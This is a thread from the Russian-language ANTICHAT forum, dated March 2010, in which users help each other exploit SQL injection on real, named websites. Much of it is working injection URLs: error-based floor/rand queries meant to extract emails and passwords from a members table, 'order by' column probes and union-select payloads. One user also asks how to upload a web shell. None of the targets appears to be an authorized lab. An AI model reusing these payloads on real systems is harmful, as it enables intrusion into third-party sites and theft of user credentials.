ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.03.2010, 22:18
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
в самое начало скрипта вставь
@ini_set("display_errors","1");
и вообще для кодинга есть другой раздел
|
|
|
12.03.2010, 22:23
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от Pashkela
и вообще для кодинга есть другой раздел
Полностью согласен. Остальной оффтоп потру.
PS Ну вот видишь, по некоторым вопросам и у нас может быть единство взглядов. 
|
|
|
|
13.03.2010, 07:45
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Pashkela
Код:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
|
|
|
|
13.03.2010, 08:36
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Сообщение от YuNi|[c
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns
Откуда должны быть в information_schema.columns пароли и емайлы?!
|
|
|
|
13.03.2010, 12:40
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Сообщение от Strilo4ka
ругаемся на юнион + селект !!!
ps 5 ветка
Не удивительно, ведь SQL запросов походу два(или больше) т.к.
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+52/*
еще что-то выдает, а
Код:
http://www.dom-ua.com/index.php?n=i&c=195&o=9408+order+by+53/*
Уже вообще пустой экран
|
|
|
|
13.03.2010, 13:48
|
|
Новичок
Регистрация: 13.03.2010
Сообщений: 6
Провел на форуме:
20810
Репутация:
0
|
|
Помогите плииз раскрутить иньекцию
http://relax.oko16.ru/uslugi.php?id=79999+union+select+1,2,3,4,5,6,7,dat abase(),9,10,123,1,1,1,1
Доступа к information cheme нет((
версия мускуля 4.1
Не могу правильно составить запрос с использованием SHOW FULL COLUMNS FROM admin
C ночи уже сижу((((
|
|
|
|
13.03.2010, 14:02
|
|
Новичок
Регистрация: 13.03.2010
Сообщений: 6
Провел на форуме:
20810
Репутация:
0
|
|
Сообщение от Strilo4ka
одно поле
А как можно шелл залить?? Или узнать какие ещё таблицы есть??
|
|
|
|
13.03.2010, 14:09
|
|
Новичок
Регистрация: 13.03.2010
Сообщений: 6
Провел на форуме:
20810
Репутация:
0
|
|
Сообщение от Strilo4ka
а воше надо иметь хакерскую догадку 
брутить! Эти данные я все уже знаю давно! Мне нужно узнать какие таблицы есть!
|
|
|
|
13.03.2010, 14:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/concat_ws(0x3a,Email,Password)/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
говорит
SQL/DB Error -- [Unknown column 'Email' in 'field list']
удаляю Email потом грит что нету Password и тд.
тоесть не выводит инфо ???!!!
Нельзя ли через floor rand вывести инфо?
Сообщение от ILYAtirtir
Откуда должны быть в information_schema.columns пароли и емайлы?!
ну в information_schema.columns должны быть все имена колонок |
|
|
|
13.03.2010, 14:23
|
|
Новичок
Регистрация: 13.03.2010
Сообщений: 6
Провел на форуме:
20810
Репутация:
0
|
|
Сообщение от Strilo4ka
по поводу колонок procedure analyse, хотя бока могут быть ис ассоциативныи масивом и тем что одно принтабельное поле или брут
короче хз
таблицы - брут... тулзу берем и засыраем логи А как выполнить procedure analyse??
Я нуб пока(((
|
|
|
|
|
|
|
|
Здесь присутствуют: 6 (пользователей: 0 , гостей: 6)
|
|
|
|
Похожие темы
Линейный вид
